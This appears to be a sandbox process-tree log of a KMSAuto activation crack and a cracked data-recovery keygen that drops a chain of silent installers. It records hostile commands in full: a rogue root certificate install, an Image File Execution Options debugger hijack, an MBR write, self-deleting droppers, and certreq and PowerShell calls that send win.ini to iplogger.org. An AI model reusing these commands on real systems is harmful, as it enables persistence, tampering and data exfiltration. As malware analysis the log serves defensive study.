C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop KMSEmulator2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete KMSEmulator2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f2⤵
-
C:\Windows\system32\reg.exereg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f3⤵
- Modifies registry key
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\wzt.datwzt.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT2⤵
-
C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER2⤵
-
C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin.datbin.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe2⤵
-
C:\ProgramData\KMSAuto\bin\AESDecoder.exeAESDecoder.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "3⤵
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind ":1688 "4⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=16882⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" start KMSEmulator2⤵
-
C:\Windows\SysWOW64\net.exenet stop sppsvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sppsvc /y3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe2⤵
-
C:\Windows\System32\taskkill.exetaskkill /t /f /IM SppExtComObj.Exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c SppPatcher_x64.dat -y -pkmsauto2⤵
-
C:\Users\Admin\AppData\Local\Temp\SppPatcher_x64.datSppPatcher_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "SppPatcher_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjPatcher.exe C:\Windows\System32\SppExtComObjPatcher.exe /Y2⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjHook.dll C:\Windows\System32\SppExtComObjHook.dll /Y2⤵
- Drops file in System32 directory
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "Debugger" /t REG_SZ /d "SppExtComObjPatcher.exe"2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "KMS_Emulation" /t REG_DWORD /d 02⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe2⤵
-
C:\Windows\system32\taskkill.exetaskkill /t /f /IM SppExtComObj.Exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\Users\Admin\AppData\Local\Temp\KMSAuto" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjPatcher.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjHook.dll"2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop KMSEmulator2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete KMSEmulator2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f2⤵
-
C:\Windows\system32\reg.exereg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f3⤵
- Modifies registry key
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "kmsauto.ini"2⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4181⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\KMSAuto\bin\KMSSS.exe"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP1⤵
- Executes dropped EXE
-
C:\ProgramData\KMSAuto\bin\KMSSS.exe"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP1⤵
- Executes dropped EXE
-
C:\Windows\system32\SppExtComObjPatcher.exeSppExtComObjPatcher.exe C:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=379cccfb-d4e0-48fe-b0f2-0136097be147;Action=CleanupState;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;Trigger=TimerEvent3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp15⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp15⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1615300462900.exe"C:\Users\Admin\AppData\Roaming\1615300462900.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300462900.txt"6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1615300467412.exe"C:\Users\Admin\AppData\Roaming\1615300467412.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300467412.txt"6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1615300472849.exe"C:\Users\Admin\AppData\Roaming\1615300472849.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300472849.txt"6⤵
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
-
C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 1 3.1615300258.604786a24b096 1016⤵
-
C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 2 3.1615300258.604786a24b0967⤵
-
C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe"C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ENE8H.tmp\syrdykki5r2.tmp"C:\Users\Admin\AppData\Local\Temp\is-ENE8H.tmp\syrdykki5r2.tmp" /SL5="$501F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CF5BJ.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-CF5BJ.tmp\winlthst.exe" test1 test110⤵
-
C:\Users\Admin\AppData\Local\Temp\hjy3rs4wttj\uqclxdwfafi.exe"C:\Users\Admin\AppData\Local\Temp\hjy3rs4wttj\uqclxdwfafi.exe" testparams8⤵
-
C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe"C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe" /VERYSILENT /p=testparams9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UC7M0.tmp\gnbvzrskz3i.tmp"C:\Users\Admin\AppData\Local\Temp\is-UC7M0.tmp\gnbvzrskz3i.tmp" /SL5="$701F2,552809,216064,C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe" /VERYSILENT /p=testparams10⤵
-
C:\Users\Admin\AppData\Local\Temp\dha0lfa4gl1\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\dha0lfa4gl1\askinstall24.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3G6TK.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-3G6TK.tmp\Setup3310.tmp" /SL5="$50288,802346,56832,C:\Users\Admin\AppData\Local\Temp\cr2scbkj5ff\Setup3310.exe" /Verysilent /subid=5779⤵
-
C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FI9IS.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-FI9IS.tmp\Setup.tmp" /SL5="$2035C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-J69PR.tmp\Setup.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GTR7N.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-GTR7N.tmp\PictureLAb.tmp" /SL5="$30666,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-GO73A.tmp\PictureLAb.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V934J.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-V934J.tmp\chashepro3.tmp" /SL5="$1034E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\0v3sndro51k\chashepro3.exe" /VERYSILENT9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"10⤵
-
C:\Program Files (x86)\JCleaner\mex.exe"C:\Program Files (x86)\JCleaner\mex.exe"10⤵
-
C:\Program Files (x86)\JCleaner\mex.exe"{path}"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"10⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"10⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"10⤵
-
C:\Program Files (x86)\JCleaner\Brava.exe"C:\Program Files (x86)\JCleaner\Brava.exe"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"10⤵
-
C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe"C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PN164.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-PN164.tmp\vict.tmp" /SL5="$1035C,870426,780800,C:\Users\Admin\AppData\Local\Temp\hlauoz2amwn\vict.exe" /VERYSILENT /id=5359⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K48FO.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-K48FO.tmp\wimapi.exe" 53510⤵
-
C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe"C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe" /ustwo INSTALL8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "xqmvz3dfafk.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ly35kvc1jql\xqmvz3dfafk.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "xqmvz3dfafk.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe"C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MIET6.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-MIET6.tmp\vpn.tmp" /SL5="$1036C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\1irrfmsko0l\vpn.exe" /silent /subid=4829⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
-
C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H2IVM.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-H2IVM.tmp\IBInstaller_97039.tmp" /SL5="$20360,14441882,721408,C:\Users\Admin\AppData\Local\Temp\vjlsxfacqpb\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T4E9D.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-T4E9D.tmp\{app}\chrome_proxy.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\tixos3qqujd\aigutgplo3u.exe"C:\Users\Admin\AppData\Local\Temp\tixos3qqujd\aigutgplo3u.exe" 57a764d042bf88⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\4K28S1JOWW\4K28S1JOW.exe" 57a764d042bf8 & exit9⤵
-
C:\Program Files\4K28S1JOWW\4K28S1JOW.exe"C:\Program Files\4K28S1JOWW\4K28S1JOW.exe" 57a764d042bf810⤵
-
